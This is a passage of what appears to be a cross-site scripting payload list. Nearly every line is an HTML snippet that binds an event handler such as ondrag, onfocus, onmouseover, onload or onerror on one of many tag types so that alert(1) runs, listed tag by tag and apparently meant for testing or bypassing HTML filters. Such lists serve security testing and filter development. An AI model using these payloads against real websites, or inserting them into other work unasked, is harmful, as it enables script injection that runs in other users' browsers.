ondrop=alert(1) contenteditable>drop here</source> +<div draggable="true" contenteditable>drag me</div><spacer ondragover=alert(1) contenteditable>drop here</spacer> +<div draggable="true" contenteditable>drag me</div><spacer ondrop=alert(1) contenteditable>drop here</spacer> +<div draggable="true" contenteditable>drag me</div><span ondragover=alert(1) contenteditable>drop here</span> +<div draggable="true" contenteditable>drag me</div><span ondrop=alert(1) contenteditable>drop here</span> +<div draggable="true" contenteditable>drag me</div><strike ondragover=alert(1) contenteditable>drop here</strike> +<div draggable="true" contenteditable>drag me</div><strike ondrop=alert(1) contenteditable>drop here</strike> +<div draggable="true" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong> +<div draggable="true" contenteditable>drag me</div><strong ondrop=alert(1) contenteditable>drop here</strong> +<div draggable="true" contenteditable>drag me</div><style ondragover=alert(1) contenteditable>drop here</style> +<div draggable="true" contenteditable>drag me</div><style ondrop=alert(1) contenteditable>drop here</style> +<div draggable="true" contenteditable>drag me</div><sub ondragover=alert(1) contenteditable>drop here</sub> +<div draggable="true" contenteditable>drag me</div><sub ondrop=alert(1) contenteditable>drop here</sub> +<div draggable="true" contenteditable>drag me</div><summary ondragover=alert(1) contenteditable>drop here</summary> +<div draggable="true" contenteditable>drag me</div><summary ondrop=alert(1) contenteditable>drop here</summary> +<div draggable="true" contenteditable>drag me</div><sup ondragover=alert(1) contenteditable>drop here</sup> +<div draggable="true" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup> +<div draggable="true" contenteditable>drag me</div><svg ondragover=alert(1) contenteditable>drop here</svg> +<div draggable="true" contenteditable>drag me</div><svg ondrop=alert(1) contenteditable>drop here</svg> +<div draggable="true" contenteditable>drag me</div><table ondragover=alert(1) contenteditable>drop here</table> +<div draggable="true" contenteditable>drag me</div><table ondrop=alert(1) contenteditable>drop here</table> +<div draggable="true" contenteditable>drag me</div><tbody ondragover=alert(1) contenteditable>drop here</tbody> +<div draggable="true" contenteditable>drag me</div><tbody ondrop=alert(1) contenteditable>drop here</tbody> +<div draggable="true" contenteditable>drag me</div><td ondragover=alert(1) contenteditable>drop here</td> +<div draggable="true" contenteditable>drag me</div><td ondrop=alert(1) contenteditable>drop here</td> +<div draggable="true" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template> +<div draggable="true" contenteditable>drag me</div><template ondrop=alert(1) contenteditable>drop here</template> +<div draggable="true" contenteditable>drag me</div><textarea ondragover=alert(1) contenteditable>drop here</textarea> +<div draggable="true" contenteditable>drag me</div><textarea ondrop=alert(1) contenteditable>drop here</textarea> +<div draggable="true" contenteditable>drag me</div><tfoot ondragover=alert(1) contenteditable>drop here</tfoot> +<div draggable="true" contenteditable>drag me</div><tfoot ondrop=alert(1) contenteditable>drop here</tfoot> +<div draggable="true" contenteditable>drag me</div><th ondragover=alert(1) contenteditable>drop here</th> +<div draggable="true" contenteditable>drag me</div><th ondrop=alert(1) contenteditable>drop here</th> +<div draggable="true" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead> +<div draggable="true" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable>drop here</thead> +<div draggable="true" contenteditable>drag me</div><time ondragover=alert(1) contenteditable>drop here</time> +<div draggable="true" contenteditable>drag me</div><time ondrop=alert(1) contenteditable>drop here</time> +<div draggable="true" contenteditable>drag me</div><title ondragover=alert(1) contenteditable>drop here</title> +<div draggable="true" contenteditable>drag me</div><title ondrop=alert(1) contenteditable>drop here</title> +<div draggable="true" contenteditable>drag me</div><tr ondragover=alert(1) contenteditable>drop here</tr> +<div draggable="true" contenteditable>drag me</div><tr ondrop=alert(1) contenteditable>drop here</tr> +<div draggable="true" contenteditable>drag me</div><track ondragover=alert(1) contenteditable>drop here</track> +<div draggable="true" contenteditable>drag me</div><track ondrop=alert(1) contenteditable>drop here</track> +<div draggable="true" contenteditable>drag me</div><tt ondragover=alert(1) contenteditable>drop here</tt> +<div draggable="true" contenteditable>drag me</div><tt ondrop=alert(1) contenteditable>drop here</tt> +<div draggable="true" contenteditable>drag me</div><u ondragover=alert(1) contenteditable>drop here</u> +<div draggable="true" contenteditable>drag me</div><u ondrop=alert(1) contenteditable>drop here</u> +<div draggable="true" contenteditable>drag me</div><ul ondragover=alert(1) contenteditable>drop here</ul> +<div draggable="true" contenteditable>drag me</div><ul ondrop=alert(1) contenteditable>drop here</ul> +<div draggable="true" contenteditable>drag me</div><var ondragover=alert(1) contenteditable>drop here</var> +<div draggable="true" contenteditable>drag me</div><var ondrop=alert(1) contenteditable>drop here</var> +<div draggable="true" contenteditable>drag me</div><video ondragover=alert(1) contenteditable>drop here</video> +<div draggable="true" contenteditable>drag me</div><video ondrop=alert(1) contenteditable>drop here</video> +<div draggable="true" contenteditable>drag me</div><wbr ondragover=alert(1) contenteditable>drop here</wbr> +<div draggable="true" contenteditable>drag me</div><wbr ondrop=alert(1) contenteditable>drop here</wbr> +<div draggable="true" contenteditable>drag me</div><xmp ondragover=alert(1) contenteditable>drop here</xmp> +<div draggable="true" contenteditable>drag me</div><xmp ondrop=alert(1) contenteditable>drop here</xmp> +<div draggable="true" ondrag="alert(1)">test</div> +<div draggable="true" ondragend="alert(1)">test</div> +<div draggable="true" ondragenter="alert(1)">test</div> +<div draggable="true" ondragleave="alert(1)">test</div> +<div draggable="true" ondragstart="alert(1)">test</div> +<div id=x tabindex=1 onactivate=alert(1)></div> +<div id=x tabindex=1 onbeforeactivate=alert(1)></div> +<div id=x tabindex=1 onbeforedeactivate=alert(1)></div><input autofocus> +<div id=x tabindex=1 ondeactivate=alert(1)></div><input id=y autofocus> +<div id=x tabindex=1 onfocus=alert(1)></div> +<div id=x tabindex=1 onfocusin=alert(1)></div> +<div onbeforecopy="alert(1)" contenteditable>test</div> +<div onbeforecut="alert(1)" contenteditable>test</div> +<div onbeforepaste="alert(1)" contenteditable>test</div> +<div onblur=alert(1) tabindex=1 id=x></div><input autofocus> +<div onclick="alert(1)">test</div> +<div oncontextmenu="alert(1)">test</div> +<div oncopy="alert(1)" contenteditable>test</div> +<div oncut="alert(1)" contenteditable>test</div> +<div ondblclick="alert(1)">test</div> +<div onfocusout=alert(1) tabindex=1 id=x></div><input autofocus> +<div onkeydown="alert(1)" contenteditable>test</div> +<div onkeypress="alert(1)" contenteditable>test</div> +<div onkeyup="alert(1)" contenteditable>test</div> +<div onmousedown="alert(1)">test</div> +<div onmouseenter="alert(1)">test</div> +<div onmouseleave="alert(1)">test</div> +<div onmousemove="alert(1)">test</div> +<div onmouseout="alert(1)">test</div> +<div onmouseover="alert(1)">test</div> +<div onmouseup="alert(1)">test</div> +<div onpaste="alert(1)" contenteditable>test</div> +<dl draggable="true" ondrag="alert(1)">test</dl> +<dl draggable="true" ondragend="alert(1)">test</dl> +<dl draggable="true" ondragenter="alert(1)">test</dl> +<dl draggable="true" ondragleave="alert(1)">test</dl> +<dl draggable="true" ondragstart="alert(1)">test</dl> +<dl id=x tabindex=1 onactivate=alert(1)></dl> +<dl id=x tabindex=1 onbeforeactivate=alert(1)></dl> +<dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus> +<dl id=x tabindex=1 ondeactivate=alert(1)></dl><input id=y autofocus> +<dl id=x tabindex=1 onfocus=alert(1)></dl> +<dl id=x tabindex=1 onfocusin=alert(1)></dl> +<dl onbeforecopy="alert(1)" contenteditable>test</dl> +<dl onbeforecut="alert(1)" contenteditable>test</dl> +<dl onbeforepaste="alert(1)" contenteditable>test</dl> +<dl onblur=alert(1) tabindex=1 id=x></dl><input autofocus> +<dl onclick="alert(1)">test</dl> +<dl oncontextmenu="alert(1)">test</dl> +<dl oncopy="alert(1)" contenteditable>test</dl> +<dl oncut="alert(1)" contenteditable>test</dl> +<dl ondblclick="alert(1)">test</dl> +<dl onfocusout=alert(1) tabindex=1 id=x></dl><input autofocus> +<dl onkeydown="alert(1)" contenteditable>test</dl> +<dl onkeypress="alert(1)" contenteditable>test</dl> +<dl onkeyup="alert(1)" contenteditable>test</dl> +<dl onmousedown="alert(1)">test</dl> +<dl onmouseenter="alert(1)">test</dl> +<dl onmouseleave="alert(1)">test</dl> +<dl onmousemove="alert(1)">test</dl> +<dl onmouseout="alert(1)">test</dl> +<dl onmouseover="alert(1)">test</dl> +<dl onmouseup="alert(1)">test</dl> +<dl onpaste="alert(1)" contenteditable>test</dl> +<dt draggable="true" ondrag="alert(1)">test</dt> +<dt draggable="true" ondragend="alert(1)">test</dt> +<dt draggable="true" ondragenter="alert(1)">test</dt> +<dt draggable="true" ondragleave="alert(1)">test</dt> +<dt draggable="true" ondragstart="alert(1)">test</dt> +<dt id=x tabindex=1 onactivate=alert(1)></dt> +<dt id=x tabindex=1 onbeforeactivate=alert(1)></dt> +<dt id=x tabindex=1 onbeforedeactivate=alert(1)></dt><input autofocus> +<dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus> +<dt id=x tabindex=1 onfocus=alert(1)></dt> +<dt id=x tabindex=1 onfocusin=alert(1)></dt> +<dt onbeforecopy="alert(1)" contenteditable>test</dt> +<dt onbeforecut="alert(1)" contenteditable>test</dt> +<dt onbeforepaste="alert(1)" contenteditable>test</dt> +<dt onblur=alert(1) tabindex=1 id=x></dt><input autofocus> +<dt onclick="alert(1)">test</dt> +<dt oncontextmenu="alert(1)">test</dt> +<dt oncopy="alert(1)" contenteditable>test</dt> +<dt oncut="alert(1)" contenteditable>test</dt> +<dt ondblclick="alert(1)">test</dt> +<dt onfocusout=alert(1) tabindex=1 id=x></dt><input autofocus> +<dt onkeydown="alert(1)" contenteditable>test</dt> +<dt onkeypress="alert(1)" contenteditable>test</dt> +<dt onkeyup="alert(1)" contenteditable>test</dt> +<dt onmousedown="alert(1)">test</dt> +<dt onmouseenter="alert(1)">test</dt> +<dt onmouseleave="alert(1)">test</dt> +<dt onmousemove="alert(1)">test</dt> +<dt onmouseout="alert(1)">test</dt> +<dt onmouseover="alert(1)">test</dt> +<dt onmouseup="alert(1)">test</dt> +<dt onpaste="alert(1)" contenteditable>test</dt> +<element draggable="true" ondrag="alert(1)">test</element> +<element draggable="true" ondragend="alert(1)">test</element> +<element draggable="true" ondragenter="alert(1)">test</element> +<element draggable="true" ondragleave="alert(1)">test</element> +<element draggable="true" ondragstart="alert(1)">test</element> +<element id=x tabindex=1 onactivate=alert(1)></element> +<element id=x tabindex=1 onbeforeactivate=alert(1)></element> +<element id=x tabindex=1 onbeforedeactivate=alert(1)></element><input autofocus> +<element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus> +<element id=x tabindex=1 onfocus=alert(1)></element> +<element id=x tabindex=1 onfocusin=alert(1)></element> +<element onbeforecopy="alert(1)" contenteditable>test</element> +<element onbeforecut="alert(1)" contenteditable>test</element> +<element onbeforepaste="alert(1)" contenteditable>test</element> +<element onblur=alert(1) tabindex=1 id=x></element><input autofocus> +<element onclick="alert(1)">test</element> +<element oncontextmenu="alert(1)">test</element> +<element oncopy="alert(1)" contenteditable>test</element> +<element oncut="alert(1)" contenteditable>test</element> +<element ondblclick="alert(1)">test</element> +<element onfocusout=alert(1) tabindex=1 id=x></element><input autofocus> +<element onkeydown="alert(1)" contenteditable>test</element> +<element onkeypress="alert(1)" contenteditable>test</element> +<element onkeyup="alert(1)" contenteditable>test</element> +<element onmousedown="alert(1)">test</element> +<element onmouseenter="alert(1)">test</element> +<element onmouseleave="alert(1)">test</element> +<element onmousemove="alert(1)">test</element> +<element onmouseout="alert(1)">test</element> +<element onmouseover="alert(1)">test</element> +<element onmouseup="alert(1)">test</element> +<element onpaste="alert(1)" contenteditable>test</element> +<em draggable="true" ondrag="alert(1)">test</em> +<em draggable="true" ondragend="alert(1)">test</em> +<em draggable="true" ondragenter="alert(1)">test</em> +<em draggable="true" ondragleave="alert(1)">test</em> +<em draggable="true" ondragstart="alert(1)">test</em> +<em id=x tabindex=1 onactivate=alert(1)></em> +<em id=x tabindex=1 onbeforeactivate=alert(1)></em> +<em id=x tabindex=1 onbeforedeactivate=alert(1)></em><input autofocus> +<em id=x tabindex=1 ondeactivate=alert(1)></em><input id=y autofocus> +<em id=x tabindex=1 onfocus=alert(1)></em> +<em id=x tabindex=1 onfocusin=alert(1)></em> +<em onbeforecopy="alert(1)" contenteditable>test</em> +<em onbeforecut="alert(1)" contenteditable>test</em> +<em onbeforepaste="alert(1)" contenteditable>test</em> +<em onblur=alert(1) tabindex=1 id=x></em><input autofocus> +<em onclick="alert(1)">test</em> +<em oncontextmenu="alert(1)">test</em> +<em oncopy="alert(1)" contenteditable>test</em> +<em oncut="alert(1)" contenteditable>test</em> +<em ondblclick="alert(1)">test</em> +<em onfocusout=alert(1) tabindex=1 id=x></em><input autofocus> +<em onkeydown="alert(1)" contenteditable>test</em> +<em onkeypress="alert(1)" contenteditable>test</em> +<em onkeyup="alert(1)" contenteditable>test</em> +<em onmousedown="alert(1)">test</em> +<em onmouseenter="alert(1)">test</em> +<em onmouseleave="alert(1)">test</em> +<em onmousemove="alert(1)">test</em> +<em onmouseout="alert(1)">test</em> +<em onmouseover="alert(1)">test</em> +<em onmouseup="alert(1)">test</em> +<em onpaste="alert(1)" contenteditable>test</em> +<embed draggable="true" ondrag="alert(1)">test</embed> +<embed draggable="true" ondragend="alert(1)">test</embed> +<embed draggable="true" ondragenter="alert(1)">test</embed> +<embed draggable="true" ondragleave="alert(1)">test</embed> +<embed draggable="true" ondragstart="alert(1)">test</embed> +<embed id=x onfocus=alert(1) type=text/html> +<embed id=x onfocusin=alert(1) type=text/html> +<embed id=x tabindex=1 onactivate=alert(1)></embed> +<embed id=x tabindex=1 onbeforeactivate=alert(1)></embed> +<embed id=x tabindex=1 onbeforedeactivate=alert(1)></embed><input autofocus> +<embed id=x tabindex=1 ondeactivate=alert(1)></embed><input id=y autofocus> +<embed onbeforecopy="alert(1)" contenteditable>test</embed> +<embed onbeforecut="alert(1)" contenteditable>test</embed> +<embed onbeforepaste="alert(1)" contenteditable>test</embed> +<embed onblur=alert(1) tabindex=1 id=x></embed><input autofocus> +<embed onclick="alert(1)">test</embed> +<embed oncontextmenu="alert(1)">test</embed> +<embed oncopy="alert(1)" contenteditable>test</embed> +<embed oncut="alert(1)" contenteditable>test</embed> +<embed ondblclick="alert(1)">test</embed> +<embed onfocusout=alert(1) tabindex=1 id=x></embed><input autofocus> +<embed onkeydown="alert(1)" contenteditable>test</embed> +<embed onkeypress="alert(1)" contenteditable>test</embed> +<embed onkeyup="alert(1)" contenteditable>test</embed> +<embed onmousedown="alert(1)">test</embed> +<embed onmouseenter="alert(1)">test</embed> +<embed onmouseleave="alert(1)">test</embed> +<embed onmousemove="alert(1)">test</embed> +<embed onmouseout="alert(1)">test</embed> +<embed onmouseover="alert(1)">test</embed> +<embed onmouseup="alert(1)">test</embed> +<embed onpaste="alert(1)" contenteditable>test</embed> +<embed src=/ onload=alert(1)> +<embed src=1 onerror=alert(1) type=image/gif> +<fieldset draggable="true" ondrag="alert(1)">test</fieldset> +<fieldset draggable="true" ondragend="alert(1)">test</fieldset> +<fieldset draggable="true" ondragenter="alert(1)">test</fieldset> +<fieldset draggable="true" ondragleave="alert(1)">test</fieldset> +<fieldset draggable="true" ondragstart="alert(1)">test</fieldset> +<fieldset id=x tabindex=1 onactivate=alert(1)></fieldset> +<fieldset id=x tabindex=1 onbeforeactivate=alert(1)></fieldset> +<fieldset id=x tabindex=1 onbeforedeactivate=alert(1)></fieldset><input autofocus> +<fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus> +<fieldset id=x tabindex=1 onfocus=alert(1)></fieldset> +<fieldset id=x tabindex=1 onfocusin=alert(1)></fieldset> +<fieldset onbeforecopy="alert(1)" contenteditable>test</fieldset> +<fieldset onbeforecut="alert(1)" contenteditable>test</fieldset> +<fieldset onbeforepaste="alert(1)" contenteditable>test</fieldset> +<fieldset onblur=alert(1) tabindex=1 id=x></fieldset><input autofocus> +<fieldset onclick="alert(1)">test</fieldset> +<fieldset oncontextmenu="alert(1)">test</fieldset> +<fieldset oncopy="alert(1)" contenteditable>test</fieldset> +<fieldset oncut="alert(1)" contenteditable>test</fieldset> +<fieldset ondblclick="alert(1)">test</fieldset> +<fieldset onfocusout=alert(1) tabindex=1 id=x></fieldset><input autofocus> +<fieldset onkeydown="alert(1)" contenteditable>test</fieldset> +<fieldset onkeypress="alert(1)" contenteditable>test</fieldset> +<fieldset onkeyup="alert(1)" contenteditable>test</fieldset> +<fieldset onmousedown="alert(1)">test</fieldset> +<fieldset onmouseenter="alert(1)">test</fieldset> +<fieldset onmouseleave="alert(1)">test</fieldset> +<fieldset onmousemove="alert(1)">test</fieldset> +<fieldset onmouseout="alert(1)">test</fieldset> +<fieldset onmouseover="alert(1)">test</fieldset> +<fieldset onmouseup="alert(1)">test</fieldset> +<fieldset onpaste="alert(1)" contenteditable>test</fieldset> +<figcaption draggable="true" ondrag="alert(1)">test</figcaption> +<figcaption draggable="true" ondragend="alert(1)">test</figcaption> +<figcaption draggable="true" ondragenter="alert(1)">test</figcaption> +<figcaption draggable="true" ondragleave="alert(1)">test</figcaption> +<figcaption draggable="true" ondragstart="alert(1)">test</figcaption> +<figcaption id=x tabindex=1 onactivate=alert(1)></figcaption> +<figcaption id=x tabindex=1 onbeforeactivate=alert(1)></figcaption> +<figcaption id=x tabindex=1 onbeforedeactivate=alert(1)></figcaption><input autofocus> +<figcaption id=x tabindex=1 ondeactivate=alert(1)></figcaption><input id=y autofocus> +<figcaption id=x tabindex=1 onfocus=alert(1)></figcaption> +<figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption> +<figcaption onbeforecopy="alert(1)" contenteditable>test</figcaption> +<figcaption onbeforecut="alert(1)" contenteditable>test</figcaption> +<figcaption onbeforepaste="alert(1)" contenteditable>test</figcaption> +<figcaption onblur=alert(1) tabindex=1 id=x></figcaption><input autofocus> +<figcaption onclick="alert(1)">test</figcaption> +<figcaption oncontextmenu="alert(1)">test</figcaption> +<figcaption oncopy="alert(1)" contenteditable>test</figcaption> +<figcaption oncut="alert(1)" contenteditable>test</figcaption> +<figcaption ondblclick="alert(1)">test</figcaption> +<figcaption onfocusout=alert(1) tabindex=1 id=x></figcaption><input autofocus> +<figcaption onkeydown="alert(1)" contenteditable>test</figcaption> +<figcaption onkeypress="alert(1)" contenteditable>test</figcaption> +<figcaption onkeyup="alert(1)" contenteditable>test</figcaption> +<figcaption onmousedown="alert(1)">test</figcaption> +<figcaption onmouseenter="alert(1)">test</figcaption> +<figcaption onmouseleave="alert(1)">test</figcaption> +<figcaption onmousemove="alert(1)">test</figcaption> +<figcaption onmouseout="alert(1)">test</figcaption> +<figcaption onmouseover="alert(1)">test</figcaption> +<figcaption onmouseup="alert(1)">test</figcaption> +<figcaption onpaste="alert(1)" contenteditable>test</figcaption> +<figure draggable="true" ondrag="alert(1)">test</figure> +<figure draggable="true" ondragend="alert(1)">test</figure> +<figure draggable="true" ondragenter="alert(1)">test</figure> +<figure draggable="true" ondragleave="alert(1)">test</figure> +<figure draggable="true" ondragstart="alert(1)">test</figure> +<figure id=x tabindex=1 onactivate=alert(1)></figure> +<figure id=x tabindex=1 onbeforeactivate=alert(1)></figure> +<figure id=x tabindex=1 onbeforedeactivate=alert(1)></figure><input autofocus> +<figure id=x tabindex=1 ondeactivate=alert(1)></figure><input id=y autofocus> +<figure id=x tabindex=1 onfocus=alert(1)></figure> +<figure id=x tabindex=1 onfocusin=alert(1)></figure> +<figure onbeforecopy="alert(1)" contenteditable>test</figure> +<figure onbeforecut="alert(1)" contenteditable>test</figure> +<figure onbeforepaste="alert(1)" contenteditable>test</figure> +<figure onblur=alert(1) tabindex=1 id=x></figure><input autofocus> +<figure onclick="alert(1)">test</figure> +<figure oncontextmenu="alert(1)">test</figure> +<figure oncopy="alert(1)" contenteditable>test</figure> +<figure oncut="alert(1)" contenteditable>test</figure> +<figure ondblclick="alert(1)">test</figure> +<figure onfocusout=alert(1) tabindex=1 id=x></figure><input autofocus> +<figure onkeydown="alert(1)" contenteditable>test</figure> +<figure onkeypress="alert(1)" contenteditable>test</figure> +<figure onkeyup="alert(1)" contenteditable>test</figure> +<figure onmousedown="alert(1)">test</figure> +<figure onmouseenter="alert(1)">test</figure> +<figure onmouseleave="alert(1)">test</figure> +<figure onmousemove="alert(1)">test</figure> +<figure onmouseout="alert(1)">test</figure> +<figure onmouseover="alert(1)">test</figure> +<figure onmouseup="alert(1)">test</figure> +<figure onpaste="alert(1)" contenteditable>test</figure> +<font draggable="true" ondrag="alert(1)">test</font> +<font draggable="true" ondragend="alert(1)">test</font> +<font draggable="true" ondragenter="alert(1)">test</font> +<font draggable="true" ondragleave="alert(1)">test</font> +<font draggable="true" ondragstart="alert(1)">test</font> +<font id=x tabindex=1 onactivate=alert(1)></font> +<font id=x tabindex=1 onbeforeactivate=alert(1)></font> +<font id=x tabindex=1 onbeforedeactivate=alert(1)></font><input autofocus> +<font id=x tabindex=1 ondeactivate=alert(1)></font><input id=y autofocus> +<font id=x tabindex=1 onfocus=alert(1)></font> +<font id=x tabindex=1 onfocusin=alert(1)></font> +<font onbeforecopy="alert(1)" contenteditable>test</font> +<font onbeforecut="alert(1)" contenteditable>test</font> +<font onbeforepaste="alert(1)" contenteditable>test</font> +<font onblur=alert(1) tabindex=1 id=x></font><input autofocus> +<font onclick="alert(1)">test</font> +<font oncontextmenu="alert(1)">test</font> +<font oncopy="alert(1)" contenteditable>test</font> +<font oncut="alert(1)" contenteditable>test</font> +<font ondblclick="alert(1)">test</font> +<font onfocusout=alert(1) tabindex=1 id=x></font><input autofocus> +<font onkeydown="alert(1)" contenteditable>test</font> +<font onkeypress="alert(1)" contenteditable>test</font> +<font onkeyup="alert(1)" contenteditable>test</font> +<font onmousedown="alert(1)">test</font> +<font onmouseenter="alert(1)">test</font> +<font onmouseleave="alert(1)">test</font> +<font onmousemove="alert(1)">test</font> +<font onmouseout="alert(1)">test</font> +<font onmouseover="alert(1)">test</font> +<font onmouseup="alert(1)">test</font> +<font onpaste="alert(1)" contenteditable>test</font> +<footer draggable="true" ondrag="alert(1)">test</footer> +<footer draggable="true" ondragend="alert(1)">test</footer> +<footer draggable="true" ondragenter="alert(1)">test</footer> +<footer draggable="true" ondragleave="alert(1)">test</footer> +<footer draggable="true" ondragstart="alert(1)">test</footer> +<footer id=x tabindex=1 onactivate=alert(1)></footer> +<footer id=x tabindex=1 onbeforeactivate=alert(1)></footer> +<footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus> +<footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus> +<footer id=x tabindex=1 onfocus=alert(1)></footer> +<footer id=x tabindex=1 onfocusin=alert(1)></footer> +<footer onbeforecopy="alert(1)" contenteditable>test</footer> +<footer onbeforecut="alert(1)" contenteditable>test</footer> +<footer onbeforepaste="alert(1)" contenteditable>test</footer> +<footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus> +<footer onclick="alert(1)">test</footer> +<footer oncontextmenu="alert(1)">test</footer> +<footer oncopy="alert(1)" contenteditable>test</footer> +<footer oncut="alert(1)" contenteditable>test</footer> +<footer ondblclick="alert(1)">test</footer> +<footer onfocusout=alert(1) tabindex=1 id=x></footer><input autofocus> +<footer onkeydown="alert(1)" contenteditable>test</footer> +<footer onkeypress="alert(1)" contenteditable>test</footer> +<footer onkeyup="alert(1)" contenteditable>test</footer> +<footer onmousedown="alert(1)">test</footer> +<footer onmouseenter="alert(1)">test</footer> +<footer onmouseleave="alert(1)">test</footer> +<footer onmousemove="alert(1)">test</footer> +<footer onmouseout="alert(1)">test</footer> +<footer onmouseover="alert(1)">test</footer> +<footer onmouseup="alert(1)">test</footer> +<footer onpaste="alert(1)" contenteditable>test</footer> +<form draggable="true" ondrag="alert(1)">test</form> +<form draggable="true" ondragend="alert(1)">test</form> +<form draggable="true" ondragenter="alert(1)">test</form> +<form draggable="true" ondragleave="alert(1)">test</form> +<form draggable="true" ondragstart="alert(1)">test</form> +<form id=x tabindex=1 onactivate=alert(1)></form> +<form id=x tabindex=1 onbeforeactivate=alert(1)></form> +<form id=x tabindex=1 onbeforedeactivate=alert(1)></form><input autofocus> +<form id=x tabindex=1 ondeactivate=alert(1)></form><input id=y autofocus> +<form id=x tabindex=1 onfocus=alert(1)></form> +<form id=x tabindex=1 onfocusin=alert(1)></form> +<form onbeforecopy="alert(1)" contenteditable>test</form> +<form onbeforecut="alert(1)" contenteditable>test</form> +<form onbeforepaste="alert(1)" contenteditable>test</form> +<form onblur=alert(1) tabindex=1 id=x></form><input autofocus> +<form onclick="alert(1)">test</form> +<form oncontextmenu="alert(1)">test</form> +<form oncopy="alert(1)" contenteditable>test</form> +<form oncut="alert(1)" contenteditable>test</form> +<form ondblclick="alert(1)">test</form> +<form onfocusout=alert(1) tabindex=1 id=x></form><input autofocus> +<form onkeydown="alert(1)" contenteditable>test</form> +<form onkeypress="alert(1)" contenteditable>test</form> +<form onkeyup="alert(1)" contenteditable>test</form> +<form onmousedown="alert(1)">test</form> +<form onmouseenter="alert(1)">test</form> +<form onmouseleave="alert(1)">test</form> +<form onmousemove="alert(1)">test</form> +<form onmouseout="alert(1)">test</form> +<form onmouseover="alert(1)">test</form> +<form onmouseup="alert(1)">test</form> +<form onpaste="alert(1)" contenteditable>test</form> +<form onreset=alert(1)><input type=reset> +<form onsubmit=alert(1)><input type=submit> +<form><input oninvalid=alert(1) required><input type=submit> +<form><input type=search onsearch=alert(1) value="Hit return" autofocus> +<form><textarea oninvalid=alert(1) required><input type=submit> +<frame draggable="true" ondrag="alert(1)">test</frame> +<frame draggable="true" ondragend="alert(1)">test</frame> +<frame draggable="true" ondragenter="alert(1)">test</frame> +<frame draggable="true" ondragleave="alert(1)">test</frame> +<frame draggable="true" ondragstart="alert(1)">test</frame> +<frame id=x tabindex=1 onactivate=alert(1)></frame> +<frame id=x tabindex=1 onbeforeactivate=alert(1)></frame> +<frame id=x tabindex=1 onbeforedeactivate=alert(1)></frame><input autofocus> +<frame id=x tabindex=1 ondeactivate=alert(1)></frame><input id=y autofocus> +<frame onbeforecopy="alert(1)" contenteditable>test</frame> +<frame onbeforecut="alert(1)" contenteditable>test</frame> +<frame onbeforepaste="alert(1)" contenteditable>test</frame> +<frame onblur=alert(1) tabindex=1 id=x></frame><input autofocus> +<frame onclick="alert(1)">test</frame> +<frame oncontextmenu="alert(1)">test</frame> +<frame oncopy="alert(1)" contenteditable>test</frame> +<frame oncut="alert(1)" contenteditable>test</frame> +<frame ondblclick="alert(1)">test</frame> +<frame onfocusout=alert(1) tabindex=1 id=x></frame><input autofocus> +<frame onkeydown="alert(1)" contenteditable>test</frame> +<frame onkeypress="alert(1)" contenteditable>test</frame> +<frame onkeyup="alert(1)" contenteditable>test</frame> +<frame onmousedown="alert(1)">test</frame> +<frame onmouseenter="alert(1)">test</frame> +<frame onmouseleave="alert(1)">test</frame> +<frame onmousemove="alert(1)">test</frame> +<frame onmouseout="alert(1)">test</frame> +<frame onmouseover="alert(1)">test</frame> +<frame onmouseup="alert(1)">test</frame> +<frame onpaste="alert(1)" contenteditable>test</frame> +<frameset draggable="true" ondrag="alert(1)">test</frameset> +<frameset draggable="true" ondragend="alert(1)">test</frameset> +<frameset draggable="true" ondragenter="alert(1)">test</frameset> +<frameset draggable="true" ondragleave="alert(1)">test</frameset> +<frameset draggable="true" ondragstart="alert(1)">test</frameset> +<frameset id=x tabindex=1 onactivate=alert(1)></frameset> +<frameset id=x tabindex=1 onbeforeactivate=alert(1)></frameset> +<frameset id=x tabindex=1 onbeforedeactivate=alert(1)></frameset><input autofocus> +<frameset id=x tabindex=1 ondeactivate=alert(1)></frameset><input id=y autofocus> +<frameset id=x tabindex=1 onfocus=alert(1)></frameset> +<frameset id=x tabindex=1 onfocusin=alert(1)></frameset> +<frameset onbeforecopy="alert(1)" contenteditable>test</frameset> +<frameset onbeforecut="alert(1)" contenteditable>test</frameset> +<frameset onbeforepaste="alert(1)" contenteditable>test</frameset> +<frameset onblur=alert(1) tabindex=1 id=x></frameset><input autofocus> +<frameset onclick="alert(1)">test</frameset> +<frameset oncontextmenu="alert(1)">test</frameset> +<frameset oncopy="alert(1)" contenteditable>test</frameset> +<frameset oncut="alert(1)" contenteditable>test</frameset> +<frameset ondblclick="alert(1)">test</frameset> +<frameset onfocusout=alert(1) tabindex=1 id=x></frameset><input autofocus> +<frameset onkeydown="alert(1)" contenteditable>test</frameset> +<frameset onkeypress="alert(1)" contenteditable>test</frameset> +<frameset onkeyup="alert(1)" contenteditable>test</frameset> +<frameset onmousedown="alert(1)">test</frameset> +<frameset onmouseenter="alert(1)">test</frameset> +<frameset onmouseleave="alert(1)">test</frameset> +<frameset onmousemove="alert(1)">test</frameset> +<frameset onmouseout="alert(1)">test</frameset> +<frameset onmouseover="alert(1)">test</frameset> +<frameset onmouseup="alert(1)">test</frameset> +<frameset onpageshow=alert(1)> +<frameset onpaste="alert(1)" contenteditable>test</frameset> +<frameset><frame id=x onfocus=alert(1)> +<frameset><frame id=x onfocusin=alert(1)> +<frameset><frame onload=alert(1)> +<h1 draggable="true" ondrag="alert(1)">test</h1> +<h1 draggable="true" ondragend="alert(1)">test</h1> +<h1 draggable="true" ondragenter="alert(1)">test</h1> +<h1 draggable="true" ondragleave="alert(1)">test</h1> +<h1 draggable="true" ondragstart="alert(1)">test</h1> +<h1 id=x tabindex=1 onactivate=alert(1)></h1> +<h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1> +<h1 id=x tabindex=1 onbeforedeactivate=alert(1)></h1><input autofocus> +<h1 id=x tabindex=1 ondeactivate=alert(1)></h1><input id=y autofocus> +<h1 id=x tabindex=1 onfocus=alert(1)></h1> +<h1 id=x 